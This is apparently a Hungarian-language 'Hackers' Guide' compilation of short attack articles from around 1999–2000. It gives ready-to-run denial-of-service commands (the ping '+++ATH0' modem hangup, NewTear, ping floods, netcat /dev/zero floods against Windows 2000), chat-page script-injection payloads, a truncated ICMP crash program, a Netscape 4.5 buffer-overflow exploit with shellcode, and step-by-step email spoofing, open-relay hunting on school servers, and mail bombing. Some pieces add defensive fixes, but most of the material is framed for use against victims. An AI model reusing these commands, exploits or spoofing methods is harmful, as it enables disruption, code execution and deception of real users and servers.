ModemBlitz néven közismert fegyver, amely a modemek egy egyszerű tévedését<br />
kihasználva megszakítja a kapcsolatot.<br />
A támadáshoz valójában nincs szükség külön erre specializálódott programra - a<br />
Linux PING parancsát is paraméterezhetjük úgy, hogy az áldozat modeme<br />
visszaküldéskor parancsnak értelmezze a packetet, s az ott megadottak szerint<br />
203
Hackers’ Guide<br />
cselekedjen ( ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx ). A fegyver gyorsan<br />
elterjedt, újabb örömteli perceket szerezve ezzel azon, magukat hackernek nevező<br />
tömegeknek, akik képesek ráclickelni a KILL gombra.<br />
Hogy is működik? Amikor megérkezik a ping a modembe, az feldolgozná... DE! mivel<br />
ECHO REQUESTED a Ping (vagyis válasz kellene rá =)) ezért vissza is indul,<br />
ahonnan jött. Na innen van a bibi. Mivel +++ jellel kezdődik ezért vezérlésnek veszi a<br />
modem, ezért végre hajtja: AT (Attention! vagyis parancs következik) h0 (hangup)...<br />
Dejá vu fog el ezen embereket látván: az egész kísértetiesen emlékeztet a pár évvel<br />
ezelötti WinNuke hadjáratra, amikoris a NetBios hibáját kiaknázva könnyedén<br />
kifagyasztható volt szinte minden Windowsos masina. Eleinte csak azok ismerték<br />
akik komolyabban foglalkoznak a "hálózati biztonságtechnikával", amikor azonban<br />
szélesebb körben elterjedt, emberek százai kattintgattak büszkén a WinNuke ikonra,<br />
hogy megmutassák nagyságukat a tudatlanabbanak. Az átlagos felhasználó<br />
ezidőben szentül hitte, hogy kilőhetetlen, ha egy programmal figyelteti a WinNuke<br />
által használt 139-es (vagy éppen 113-as) portot, s ugyanakkor annak is "tudatában<br />
volt", hogy minden program WinNuke, amivel meg lehet fosztani Windows-át a<br />
ténykedés édes pillanataitól.<br />
Nem kevés Matáv-szitkozódásnak állt valódi háttereként mostanában egy-egy ATH0<br />
parancs - sokszor bármiféle indok nélkül, a gyilkolás felemelő érzéséért, vagy<br />
történetesen azon megalapozott ok miatt, hogy az áldozat nem volt hajlandó a<br />
fenyegetés ellenére sem OP-ot adni IRC-n. úgy látszik, az emberek többsége nem<br />
alkalmas arra, hogy olyan hatalommal bírjon, mely a modemesek 80%-át képes<br />
"elpusztítani".<br />
A ModemBlitz-el ezúttal könnyebb dolgunk van mint a WinNuke-al - annak ellenére,<br />
hogy gyakorlatilag sem tűzfal, sem egyéb védelmi rendszer nem véd meg tőle, ha<br />
egy ügyes támadóval állunk szemben. A védelemhez csupán le kell tiltanunk a +++<br />
parancsokat, azaz a modem extra beállításaihoz<br />
(Sajátgép/Vezérlőpult/Modemek/Tulajdonságok/Kapcsolat/Egyebek/Extra<br />
beállítások) egy "S2=255"-öt kell írnunk. [Linux alatt: /etc/wvdial.conf - > az ATZ<br />
helyére s2=255 -öt kell írni!-H3XR00T] A következő csatlakozás után már sértetlenek<br />
vagyunk - nyugodtan hátradőlve élvezhetjük a netezést, s talán csak néha-néha fog<br />
el egy aggasztó gondolat: vajon azok, akik hatalmukkal nem telefonkapcsolatok,<br />
hanem az emberiség 80%-át képesek elpusztítani, mikor clickelnek a KILL gombra?<br />
Eredeti: ViDe0 [Kiegészítések: H3XR00T]<br />
- H3XR00T -<br />
http://hexnet.hpage.net/<br />
************************************************************************************************<br />
204
A +++ath0 avagy a modemblitz<br />
Tudnunk kell, hogy ez a vonal megszakitasi modszer nem a modemblitz<br />
isteni aldasa. Barki elloheti linux alol vagy unix alol, vagy barmilyen<br />
ping-er segitsegevel, ami tartalmaz pattern lehetoseget (a kuldo hata-<br />
rozza meg a csomag tartalmat). Egy rovid megjegyzes arrol, hogy mijaza<br />
Ping (nem sazkszoveg a kezdok kedveert, a tobbiek meg ugyis tuggyak).<br />
A ping egy olyan adatcsomag amely nevezheto akar halozati hanglokator-<br />
nak is. Segitsegevel megvizsgahatunk cimeket, hogy elnek-e, mennyi<br />
a keses a kuldo es fogado kozott. Ezt az idot nevezhetjuk korbejarasi<br />
idonek is. A lenyeg az, hogy valasz erkezik a jelunkre. Ha gonoszkodni<br />
akarunk szegeny dialup-ossal (modemes gyengebbek kedveert), akkor a<br />
Ping-unket igy kuldhetjuk :<br />
Hackers’ Guide<br />
ping -p 2b2b2b415448300d IP + + + A T H 0 ENTER (mindt tuggyuk... illene...)<br />
(IP helyere persze egy szam kell... >:) )<br />
Lathato, hogy a szamunkra ugy ertekes +++ath0 ascii kodjanak megfelelo<br />
hexa erteket kap (nana' majd azt hitted mehet egybol a +++ath0 ???).<br />
Altalaban nem erdemes igy kuldenunk mert nagyon leterheli a kapcsola-<br />
tunkat. Ezert erdemes megadni a csomagok szamat count-al.<br />
ping -c 5 -p 2b2b2b415448300d IP<br />
Ebben az esetben otszor fog kuldeni ping-et. Ez azert kell mert eltun-<br />
hetnek adatcsomagok es meg fenn marad a celpont... :)<br />
Barmelyiket tesszuk is tok mind1. A lenyeg hogy elerjen a mi kis ajan-<br />
dekunk.<br />
Kerdes :<br />
Miert bont ?<br />
Mikor megerkezik az adat csomagunk (aminek felepiteset itt es most nem<br />
taglalom) akkor ugy beerkezik a modembe... onnan feldolgozasra keulne,<br />
de mivel ECHO REQUESTED a Ping ezert vissza is indul. Na itt kezdodik a<br />
baj. Berkezik a modemunkbe de mivel +++ jellel kezdodik ezert vezerles-<br />
nek tekinti amirol ugy gondolja, hogy buta op rendszerunktol jott.<br />
Ezert elkezdi vegre hajtani : az AT egy parancstipus a modemben.<br />
a h0 pedig a hangup-ot jelzi. Szal' pusztan ennyi. Itt most ugye<br />
kene egy kis halo ismeret, egy kis op rendszer ismeret, eegy kis hw<br />
ismeret, hogy ugyan akkor hogyan... De ezt talan majd kesobb...<br />
Hogyan is vedjuk ?<br />
Win alol eleg ecceru a dolog. Ecceruen beaalitod, hogy a modemed ne a<br />
+++ -t vegye vezerlesnek hanem valami mast. Ennek beallitasa Angol<br />
Win95/98 alatt:<br />
My computer -=> Dial-Up net -=> valamelyik connecten jobb klikk es<br />
properties -=> Connect using Configure -=> Connection -=> Advanced<br />
205
Hackers’ Guide<br />
-=> Extra settings-be ird be : s2=szam (szam egy 0 es 255 koze eso<br />
szam, lehetoleg ne 43 legyen... az az alap... :) )<br />
Magyar Win95/98-t meg ne hasznaljatok ! De amugy ua. ...<br />
Sajat gep -=> Telefonos hal. -=> valamelyik connecten jobb klikk es<br />
tulajdonsagok -=> Kapcsolat Beallitas(?) -=> Kapcsolat -=> Advanced(?)<br />
-=> Extra beallitasok.<br />
Linux:<br />
/etc/wvdial.conf -=> az ATZ helyére hogy s2=255<br />
Ez persze mind azert lett leirva, hogy ki tudjatok vedeni. NEM AZERT,<br />
hogy lojjetek !<br />
Inkabb legyunk bekeben. Az a legjobb...<br />
LipIQe<br />
Ha kerdesed lenne:<br />
lipiqe@freemail.c3.hu<br />
************************************************************************************************<br />
NewTear<br />
A NewTear olyan csomagokat kuld a celgepre, melyeket az aztan nem tud<br />
osszerakni, es ebbe bizony beledoglik meg az SP4-es NT4Wks is... SP5 alatt nem<br />
lett tesztelve egyebkent. Termeszetesen csak linux alatt muxik... Erdemes egy masik<br />
virtualis terminalon ezt hasznalni ezzel parhuzamosan (csak linux alatt):<br />
ping -f IPCIM -s 8096<br />
Egy tipikus tamadas:<br />
newtear FAKEIPCIM CELGEPIPCIM -n 20000<br />
Ekkor 20000-szer kuldi el a cuccost, en minimum ennyivel nyomatom.<br />
Elviekben tehat az NT lazan kidumpol tole, nagy karokat lehet vele okozni, es ez<br />
nem reklamszoveg!<br />
Vedekezes: gumival, de jobb, ha a TCP/IP beallitasoknal nezunk korul, es az UDP-t<br />
csak meghatarozott portokon engedelyezzuk, eleg szivacs melo, jobb elerekni az<br />
NT-s halo ele egy jo routert, ami szuri a csomikat... En a Cisco 2620-ast tudom<br />
ajanlani, az a tuti.<br />
NewTear letöltése<br />
206<br />
KohiNoor
Hackers’ Guide<br />
************************************************************************************************<br />
DoS Tamadasok fajtai<br />
by Lord Lsd<br />
FIGYELEM! Ennek a leirasnak a megertesehez kell nemi ismeret az internet<br />
mukodeserol, ugyhogy ha nem joban ezzel a Tmaval ne is folytasd az olvasast!<br />
Csapjunk a lovak koze:<br />
Bonk> Spoofolt udp csomagokat kuld. Eloidezhet ujraindulasokat is!<br />
Boink> A Bonk tovabbfejlesztett valtozata<br />
Teardrop> Kihasznalja a win95/NT hibajat. 2.0.32-nel alacsonyabb szintu Linux<br />
kernelnel is mukodik<br />
Newtear> A Teardrop masik valtozata<br />
Ping -f> A leghatasosap modszer az internet kapcsolat megszakitasara, de root<br />
jogunak kell lenned,hogy meg bird csinalni.<br />
Egyeb leirasokert, programokert nezd meg a rootshell.com-t!<br />
************************************************************************************************<br />
Internetto chat szivatás<br />
-=[Bevezetõ]=-<br />
Egyik nap Fishbone osztálytársammal az sztech teremben üldögéltünk...<br />
...már qurvára unatkoztam, amikor felhívta a figyelmem a<br />
www.internetto.hu/stb/presszo internetes chat oldalra...<br />
-=[Maga a lényeg]=-<br />
Begépeltem és lõn-csoda, lõn-világosság bejött... ;] Szal' kb. 1 perce chateltunk<br />
amikor eszrevettem valamit a rendszerben. Hibának nem nevezném, mert ezeket a<br />
cgi-s chateket ugy gyártottak, hogy amit azt ugyanugy jeleníti meg tehat a közti<br />
szöveget értelmezi, tehát parancsnak tekinti és lefutatja... ;]<br />
-=[Tippek]=-<br />
207
Hackers’ Guide<br />
A következõ üzenet amit gépeltem: Megy???? ;] <br />
és még valami a java-s cuccokat is futtatja.<br />
Nos volt egy gondolat fosszfányom, méghozzá, hogy valószímûleg mindenki<br />
windowsból nyomja java tamogatással. Otthon elkeztem irogatni a javas cuccokat az<br />
estére. Az eredmény kb. 3 óra csend a presszóban. ;] Kb ilyen dolgokat irogattam<br />
este:<br />
setTimeout("top.location.href = '/con/con'",1);<br />
<br />
Aki erti a java nyelvet annak világos a kód, aki meg nem az probalja ki... irja be egy<br />
*.htm filebe es nyissa meg. ;] Ezt a kódot egyébként a bizonyos freames bannerek<br />
kiírtására terveztem.<br />
Akkor a következõ trükköm az volt hogy fogtam és elmentettem az egész oldalt<br />
fogtam és a küldés gombra bármilyen linket rátettem és az elõzõ scriptet futtattam<br />
csak a /con/con helyett az oldal helye volt.<br />
Akkor ez is java:<br />
while (1 != 2){self.parent.close()} <br />
ez is laza... ugyanebbol kiundúlva:<br />
while (1 != 2){alert('www.rulezlinux.com')} <br />
A dolognak egyetlen "hibája" van, szóval a dolgokat csak akkor hajlando futtatni ha<br />
egy sorba irod, tehát nincs enter a kódban.<br />
A többit talaljátok ki! ;]<br />
-=[a Végére...]=-<br />
Ez a text csak szemléltetés! ;]<br />
Special Thanx tO: fiShBonE<br />
bY: DomIni$<br />
mailto: root@rulezlinux.com<br />
www.rulezlinux.com<br />
#silver<br />
************************************************************************************************<br />
NUKING IS LAMEEE....<br />
avagy ismertető a közelmúlt legismertebb háborúzó programjáról.<br />
208
Mi az a NUKE ?<br />
Hackers’ Guide<br />
Akkor beszélünk NUKE támadásról, ha valaki szándékosan ún. OOB (Out of Bands<br />
vagy Out of Bounds) adatokat küld neked. Ezeknek az adatoknak ez elküldésével,<br />
eléri, hogy összeomoljon a számítógéped és beálljon a híres kék halál. Windows 95<br />
esetében valószínűleg valami hasonló jelenik meg:<br />
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.<br />
This was called from 0028: in VxD NDIS(01) + 00000D7C.<br />
Itt látszik, hogy a MSTCP-t és az NDIS-t hibáztatja.<br />
NT-n még nem láttam nagy halált, úgyhogy nem tudom mit ír ki, csak annyit tudok,<br />
hogy ott a TCPIP.SYS szerinte a hiba oka.<br />
Mi történik ha NUKE-olt valaki ?<br />
Mint már említettem, ha NUKE támadás ért, akkor hibaüzenetettel összeomlik a<br />
rendszer. A Windows 95 megszakítja a kapcsolatot, de nem biztos, hogy újra kell<br />
indítani a gépet (azért ajánlott). Az NT esetében - szinte - mindig újra kell indítani a<br />
gépet.<br />
Hogyan működik ?<br />
NT esetében:<br />
A küldő egy "Out of Band" adatot határoz meg, úgy, hogy egy ún. "urgent bit flag"-et<br />
(kb. sürgető bit flag) rak a TCP fejlécébe. Az adat fogadója az ún. "urgent pointer"-t<br />
(ezt inkább le sem fordítom, mert olyan hülyén hangzana) használja annak<br />
meghatározására, hogy az "urgent data" hol ér véget. A Windows NT-ben a bug az<br />
alábbi módon jelenik meg: ha az "urgent pointer" az adatszerkezet végére mutat és<br />
azt nem követi - számára - értelmes adat, akkor fagyi van. Az NT-nek "normális"<br />
adatokra lenne szüksége.<br />
Win95 esetében:<br />
Erről sajnos nincs megbítható információ, de annyi biztos, hogy nem tudja kezelni az<br />
OOB adatokat és emiatt van a hiba.<br />
Általában a NUKE-ot a 139-es porton szokták küldeni, ugyanis ez a port a<br />
leggyakrabban nyitott (Netbios - nbsession). Nemcsak a 139-es port támadható,<br />
hanem minden olyan port, ami nyitva van. (általában 53, 113, 139, 80) A nyitott<br />
portokról, portscannerek segítségével szerezhetsz információt. Ilyen portscannerek<br />
(is) találhatóak a http://w3.swi.hu/enfusia oldalán.<br />
Mikor vagyok támadható ?<br />
209
Hackers’ Guide<br />
1., Windows 95-öt használsz (összes verzió).<br />
2., Windows NT 3.51-ed van.<br />
3., Windows NT 4.0-ád van SP3 nélkül.<br />
4., Windows 3.11-ed van.<br />
Hogyan tudom megvédeni magam ?<br />
1., Win95 - vtcpupd.exe<br />
2., WinNT 4.0<br />
- SP2 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/<br />
- SP3 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/<br />
3., Win 3.11<br />
1., Baktass el a SYSTEM könyvtárba és keresd meg a system.ini file-t.<br />
2., Ezt írd be közvetlenül az: [MSTCP] rész után: BSDUrgent=0<br />
Frissítettem a rendszerfile-okat, de meg szeretném tudni, hogy védve vagyok-e.<br />
Ha mindenáron lövetni szeretnéd magad, akkor látogass el a<br />
http://www.yikes.com/nuke/ címre, ahol addig lövetheted magad, amíg akarod.<br />
Hogyan tudom megnézni, hogy ki támad ?<br />
Manapság már kismillió ilyen program van. Én személy szerint a Nukenabbert<br />
kedvelem, azért is, mert jelzi a portscannelést. Ha le akarod tölteni akkor ajánlom a<br />
http://w3.swi.hu/enfusia címet, ami kis kezem munkája (hááát igen minden<br />
"szentnek" maga felé hajlik a keze...).<br />
Sea-you<br />
sea-you@freemail.hu<br />
************************************************************************************************<br />
Win98 TCP/IP bug<br />
A Win98 TCP/IP - je az ICMP-Type13 (timestamp request) csomagoktol behal !!<br />
Ennek a kihasznalasara itt van egy kis program:<br />
#include <br />
#include <br />
#include <br />
#include <br />
#include <br />
#include <br />
#include <br />
210
#include <br />
#include <br />
#include <br />
#define __FAVOR_BSD<br />
#include <br />
#include <br />
#include <br />
#define IP_SIZE sizeof( struct iphdr )<br />
u_short<br />
in_cksum( u_short *addr, int len )<br />
{<br />
int nleft = len;<br />
u_short *w = addr;<br />
int sum = 0;<br />
u_short answer = 0;<br />
int<br />
/*<br />
* Our algorithm is simple, using a 32 bit accumulator (sum), we add<br />
* sequential 16 bit words to it, and at the end, fold back all the<br />
* carry bits from the top 16 bits into the lower 16 bits.<br />
*/<br />
while( nleft > 1 )<br />
{<br />
sum += *w++;<br />
nleft -= 2;<br />
}<br />
/* mop up an odd byte, if necessary */<br />
if (nleft == 1)<br />
{<br />
*( u_char *)( &answer ) = *( u_char *)w;<br />
sum += answer;<br />
}<br />
/* add back carry outs from top 16 bits to low 16 bits */<br />
sum = ( sum >> 16 ) + ( sum & 0xffff ); /* add hi 16 to low 16 */<br />
sum += ( sum >> 16 ); /* add carry */<br />
answer = ~sum; /* truncate to 16 bits */<br />
return( answer );<br />
}<br />
Hackers’ Guide<br />
211
Hackers’ Guide<br />
send_icmp_packet( int sock_send, u_long src_addr, u_long dst_addr )<br />
{<br />
char *packet, *cksum; /* packet, cksum */<br />
int send_status, loop;<br />
struct iphdr *ip; /* ip header */<br />
struct icmp *icp; /* icmp header */<br />
struct sockaddr_in from; /* sockaddr */<br />
struct sockaddr_in to; /* sockaddr */<br />
/************************************/<br />
/* get and init packet_memory_area */<br />
/************************************/<br />
packet = ( char *)malloc( IP_SIZE + 20 );<br />
ip = ( struct iphdr *)( packet );<br />
icp = ( struct icmp *)( packet + IP_SIZE );<br />
memset( packet, 0, IP_SIZE + 20 );<br />
/****************/<br />
/* IP header */<br />
/****************/<br />
ip->saddr = src_addr;<br />
ip->daddr = dst_addr;<br />
ip->version<br />
Petycomp<br />
************************************************************************************************<br />
D.o.S-ra alkalmas bug a W'2000-ben<br />
Fordította:HSi<br />
Röviden:<br />
Szolgáltatás szüneteltetését lehet elérni különbözõ portok igénybevételével Windows<br />
2000-es szerverekkel felszerelt hálózatokon. A támadások többségével 100%-os<br />
processzorterhelést lehet elõidézni egy Windows 2000-es szerveren<br />
Részletek:<br />
212
Hackers’ Guide<br />
A Windows 2000 különbözõ szolgáltatásai védtelenek egy egyszerû támadással<br />
szemben, melyekkel távoli felhasználok rövid idõn belül akár 100%-ra is<br />
felpörgethetik a szerver processzorát, ráadásul ezzel nem is terhelik meg nagyon<br />
saját gépüket.<br />
A hiba a következõ portok elérésekor jelentkezik: TCP portok közül: 7, 9, 21, 23,<br />
7778 ; UDP portok közül: 53, 67, 68, 135, 137, 500, 1812, 1813, 2535, 3456.<br />
Amíg a célgép ki nem dõl, addig a processzor terheltsége jelentõsen emelkedik,<br />
egészen a 100%-ig.<br />
Linux alatt a hibát nagyon egyszerûen ki lehet használni a netcat programmal, ha a<br />
/dev/zero eszközt használjuk bemenetnek. Pl.: "nc target.host 7 < /dev/zero" a TCP<br />
portokra, míg az UDP portokra: "nc -u target.host 53 < /dev/zero"<br />
Mivel a hiba kihasználásával több szolgáltatás is elérhetetlenné válik viszonylag<br />
egyszerûen és rövid idõn belül, az egész disztribucióra nézve nagy veszélyt hordoz<br />
magában.<br />
Bõvebb információ:<br />
A hibát a SecureXpert jelentette.<br />
Eredeti szerzõ:SecureXpert<br />
Eredeti cím: New Denial of Service attacks on Windows 2000 Server<br />
************************************************************************************************<br />
Pirch'98 ident/fserve daemon DoS támadás<br />
Ez a cikk fordítás, az eredeti cikket írta: Chopsui-cide/MmM '00 - The Mad Midget<br />
Mafia - http://midgets.box.sk/<br />
A Pirch98 IRC kliens le tud állni egy egyszeru túlcsordulás miatt, ha az fserve vagy<br />
az ident daemon aktív.<br />
A forráskód:pirch98.c<br />
Scalpal<br />
************************************************************************************************<br />
213
Hackers’ Guide<br />
War FTP DoS (MKD/CWD)<br />
Ez a cikk fordítás, az eredeti cikket írta: Toshimi Makino -crc@sirius.imasy.or.jp<br />
A War FTPd egy nagyon népszeru FTP server Windows 95-höz, 98-hoz és NT-hez.<br />
Egy új DoS támadást találtak a napokban a War FTPd server ellen. Ez az új támadás<br />
eléggé egyszeru, egy buffer túlcsordulásból áll, ami végbemegy, ha egy hosszú<br />
parancsot küldessz az FTP session alatt!<br />
A forráskód:warftpd-dos.c<br />
Scalpal<br />
************************************************************************************************<br />
Netscape Nav./Com. 4.5 buffer túlcsordulás<br />
Ez a cikk fordítás, az eredeti cikket írta: Steve Fewerdarkplan@oceanfree.net<br />
A buffer túlcsordulás a Netscape Navigatornál egy futtatható önhatalmú kódot<br />
használhat. Ez egy helyi támadás, ahol a bántó fél a felhasználó fájlja a "prefs.js",<br />
általában a c:\program files\netscape\users\***, ahol a felhasználó van. A<br />
túlcsordulás akkor fordul elo, amikor a Netscape Navigator által olvasott adat<br />
nagyobb, mint 80 bájt a network.proxy.http mezoben.<br />
Az exploit forráskódja:netsexp.txt<br />
Scalpal<br />
related to - Netscape Navigator/Communicator 4.5<br />
By adding the following line to the preferences file of Netscape Navigator:<br />
user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC");<br />
Netscape Navigator crashes and can be caused to execute arbitrary code,<br />
compromising system security.<br />
Exploit:<br />
214
/* Stack based buffer overflow exploit for Netscape Navigator 4.5<br />
* Author Steve Fewer, 22-12-99. Mail me at darkplan@oceanfree.net<br />
*<br />
* Netscape Navigator causes a buffer overflow when reading from<br />
* the users "prefs.js" file. If it reads a string longer than 80<br />
* bytes in the user_pref("network.proxy.http", "proxy.com");<br />
* field it smashes the stack overwrighting the EIP and EBP. This<br />
* can be used to execute arbitrary code.<br />
*<br />
* Tested with Netscape Navigator 4.5 using Windows98 on an Intel<br />
* PII 400 with 128MB RAM<br />
*<br />
* http://indigo.ie/~lmf<br />
*/<br />
#include<br />
#include<br />
int main()<br />
{<br />
printf("\n\n\t\t........................................\n");<br />
printf("\t\t.....Netscape Navigator 4.5 exploit.....\n");<br />
printf("\t\t........................................\n");<br />
printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n");<br />
printf("\t\t.........http://indigo.ie/~lmf..........\n");<br />
printf("\t\t........................................\n");<br />
printf("\t\t.....-==-......\n");<br />
printf("\t\t......Magyar Nyelvu Hack Leirasok.......\n\n");<br />
Hackers’ Guide<br />
// the first 80 bytes. These get blown away when the stack goes down.<br />
char buff[96];<br />
// the EBP, we don't need to use it so fill it with B's<br />
char ebp[8] = "BBBB";<br />
// we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP @<br />
7FD035EB<br />
char eip[8] = "\xEB\x35\xD0\x7F";<br />
// the is our 'arbitrary code', it just runs a file app.exe from the<br />
\WINDOWS\COMMAND directory then calls exit() to clean up<br />
char sploit[128] =<br />
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45<br />
\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8<br />
\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\<br />
xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";<br />
FILE *file;<br />
for(int i=0;i<br />
215
Hackers’ Guide<br />
************************************************************************************************<br />
Fake Email<br />
Tartalom<br />
I. Fake Email<br />
II. Pelda<br />
I. Fake Email<br />
Email<br />
Valoszinuleg sok fake mailrol szolo dokut olvastatok mar, itt van meg egy. Ha<br />
nevtelenul szeretnel vkinek, vkiknek emailt kuldeni a legegyszerubb egy anonymous<br />
mail program hasznalata. Azonban ha a regi jol bevalt modszert akarod hasznalni<br />
akkor tessek. Az elso dolgod, hogy telnetelj be barmilyen UNIX alapu gep 25-os<br />
portjara. Az eredmeny valahogy igy fog kinezni:<br />
220 dickheads.com ESMTP<br />
Sendmail 8.8.8/8.8.8/Debian/GNU; Fri, 9 Apr 1999 13 :24:06 +0200.<br />
Utana johet a HELP parancs:<br />
214-This is Sendmail version 8.8.8<br />
214-Topics:<br />
214- HELO EHLO MAIL RCPT DATA<br />
214- RSET NOOP QUIT HELP VRFY<br />
214- EXPN VERB ETRN DSN<br />
214-For more info use "HELP ".<br />
214-To report bugs in the implementation send email to<br />
214- sendmail-bugs@sendmail.org.<br />
214-For local information send email to Postmaster at your site.<br />
214 End of HELP info<br />
Ezutan beirod, hogy helo [IP vagy hostname]. Ha a helo nem mukodne akkor<br />
ehlo-t irj. Ezutan meg kell adni a sender nevet. Ez lehet barmi. Tehat irjuk:<br />
216
mail from: CableBreakers<br />
Ezt kovetoen a cimzett kovetkezik, ide egy igazi mail cimet irjunk.<br />
rcpt to: clinton@monica.gov<br />
A kovetkezo lepes maga a level. A data parancs kiadasaval elkezdhetjuk irni a<br />
szoveget. Ha vegeztunk egy "." utan zarhatjuk a dolgot, majd quit.<br />
Ugye milyen egyszeru? >:)<br />
II. Pelda<br />
Hackers’ Guide<br />
telnet clinton.monica.gov<br />
Trying xy...<br />
Connected to clinton.monica.gov.<br />
Escape character is '^]'.<br />
220 clinton.monica.gov ESMTP Sendmail 8.9.3/8.8.8; Thu, 8 Apr 1999 13:33:35<br />
+0200<br />
helo clinton.monica.gov<br />
250 clinton.monica.gov Hello kenneth@starr.com [666.666.666.666], pleased to<br />
meet you<br />
mail from: CableBreakers<br />
250 CableBreakers... Sender ok<br />
rcpt to: clinton@monica.gov<br />
250 clinton@monica.gov... Recipient ok<br />
data<br />
354 Enter mail, end with "." on a line by itself<br />
Yippee!<br />
.<br />
250 NAA29263 Message accepted for delivery<br />
quit<br />
221 clinton.monica.gov closing connection<br />
Connection closed by foreign host.<br />
=====Cable<br />
Breakers=====================1999=========KerNel^Panic=============<br />
==<br />
************************************************************************************************<br />
Hogyan küldjünk álcázott leveleket? (fakemail)<br />
217
Hackers’ Guide<br />
Most bemutatom, hogyan lehet úgy e-mailt küldeni, hogy nagyon nehezen lehessen<br />
minket visszanyomozni. Ehhez a telnet.exe nevű programot fogjuk használni, ami<br />
minden operációs rendszerben benne van. Indítsuk el: Start>Run, és írjuk be: telnet.<br />
Tegyünk egy kis kitérőt. A levelezés manapság az Interneten az SMTP (Simple Mail<br />
Transfer Protocol) szabályrendszerrel megy. Ez azt jelenti, hogy ha bizonyos<br />
szabályokat betartunk, akkor a világon bármely mailszerver el fogja fogadni a feladott<br />
levelünket. Most lépésről lépésre végigmegyünk a levél elküldésének<br />
mechanizmusán. Nem bonyolult. Az összes levelezőprogram (Outlook Express,<br />
Pegazus Mail stb.) ezt a protokollt használja, csak kiegészíti néhány extrával.<br />
A következő példában küldünk egy e-mailt a billgatez@microsoft.com címre, és úgy<br />
fogjuk álcázni a levelünket, hogy úgy tűnjön, mintha az orban@parlament.hu címről<br />
jött volna (ezek kitalált címek. Ahhoz, hogy a levél el is menjen, a címzettnek<br />
létezőnek kell lennie.)<br />
>>MS Windows 9x
Hackers’ Guide<br />
Ez mind nagyon szép és jó. A címzett azt fogja látni, hogy a feladó e-mail címe<br />
orban@parlament.hu de ezzel még nem rejtettük el a nyomainkat. Minden<br />
levelezőprogramban van egy funkció, amellyel a levél összes fejlécét meg lehet<br />
nézni. Ezt a fejlécet a levél lezárása után a mailszerver illeszti a levélhez. Ebben a<br />
fejlécben többek között benne lesz az IP-címünk is, amelyről a szerverre<br />
bejelentkeztünk. Ez alapján még mindig visszanyomozhatóak vagyunk, tehát a<br />
mailszerverre történő bejelentkezés előtt menjünk keresztül egy proxyn (SOCKS<br />
vagy WinGate vagy egyéb), hogy megnehezítsük a visszakeresésünket. (Lásd a<br />
Proxyk című írást.)<br />
Léteznek olyan mailszerverek, amelyek hajlandóak továbbítani a levelünket egy<br />
másik mailszerverhez. Ezáltal az IP címünk nem fog megjelenni a címzettnél a levél<br />
fejlécében. Ha találunk ilyet, akkor a címzett mailszervere helyett ehhez<br />
csatlakozhatunk, a művelet többi része azonos a fent leírtakkal. Azonban ilyet nehéz<br />
találni. Leírok egy módszert, hogyan lehet ilyeneket keresni.<br />
Először is, ne katonai és ne kormányszervezeteknél próbálkozz, hanem oktatási<br />
intézményeknél: egyetemek, főiskolák, középiskolák hálózatain (kisebb az esélye,<br />
hogy lebuksz, és sok rendkívül rosszul konfigurált szerver van). Ehhez használj egy<br />
internetes keresőrendszert ( http://altavizsla.matav.hu/, http://heureka.net.hu/, stb.)<br />
és keress rá arra, hogy "egyetem" meg "főiskola" meg "középiskola" és próbáld<br />
megszerezni minél több iskolának a honlapcímét. Ha például találsz egy ilyet:<br />
http://www.egyetem.hu, akkor valószínűleg a mailszervere URL-je mail.egyetem.hu<br />
vagy www.egyetem.hu lesz. Csinálj egy hosszú listát, és telnettel nézd végig őket.<br />
Ha a mailszerver támogatja a továbbítást (routing) akkor az RCPT TO: blabla<br />
parancs kiadása után nem kapunk hibaüzenetet. Ha kapunk, akkor a mailszerver<br />
nem is fogja elküldeni a levelünket, hanem "Routing denied" vagy valami hasonló<br />
hibaüzenetet ad. Ekkor húzzuk ki a szervert a listából és próbálkozzunk a<br />
következővel :)<br />
Macerás dolog, és keveset fogunk találni (ha egyáltalán). Ne használjuk egy szervert<br />
ilyen célokra túl sokat, mert észreveszik és letiltják.<br />
Nem, nem adok mailszerver listát :) Keress magadnak, ahogy bárki más. Max.<br />
cserébe..<br />
Voyager2<br />
************************************************************************************************<br />
Spoofed mail bombing by ReWtEr<br />
Itt van egy kis kibaszas arra az esetre hogyha iszonyu agressziv es nagyon gonosz<br />
emberek vagyunk es y0l ki akarunk szurni egy egy sot KETTO rencergizdaval, avagy<br />
hogy uszitsuk egymasra ket rendszer rendszergazdait akiket nem szeretunk ;)<br />
219
Hackers’ Guide<br />
Tegyuk fel, hogy van 3 rendszer:<br />
1: attak.com (ezek vagyunk mi)<br />
2: friendofsux.com (az aldozat barat rendszere, amelyben megbizik (trusted system))<br />
3: sux.com (az aldozat maga)<br />
Nekunk mondjuk nem tetszik hogy friendofsux.com sux.com baratja es ugy dontunk<br />
hogy egymasra akarjuk oket uszitani. Vagy egyszeruen csak meg akarjuk szivatni<br />
mindket rendszert. Vagy csak ki akarjuk probalni ebben a textben leirtakat. Ne kelljen<br />
mar nekem okokat talalni a lenyeg hogy:<br />
Minden hacker wannabe tudja hogy hogy kell sendmailelni a 25-os portrol akamilyen<br />
rendszerrol es azt is hogy hogy kell spoofed mailt kuldeni ezen az uton ugy, hogy ne<br />
nagyon kapjanak el. Aki nem tudja annak nem erdemes ezt a textet vegigolvasnia.<br />
Sz'al ha lama vagy elhuzhacc a jo budos francba mer' ez nem neked valo. Ha az<br />
vagy nem kell tovabb olvasni. De tegyuk fel hogy aki eljutott idaig az nem lama.<br />
Sz'al attak.com telnetel sux.com-ra a 25-os portra es kuld egy par ezer mailt<br />
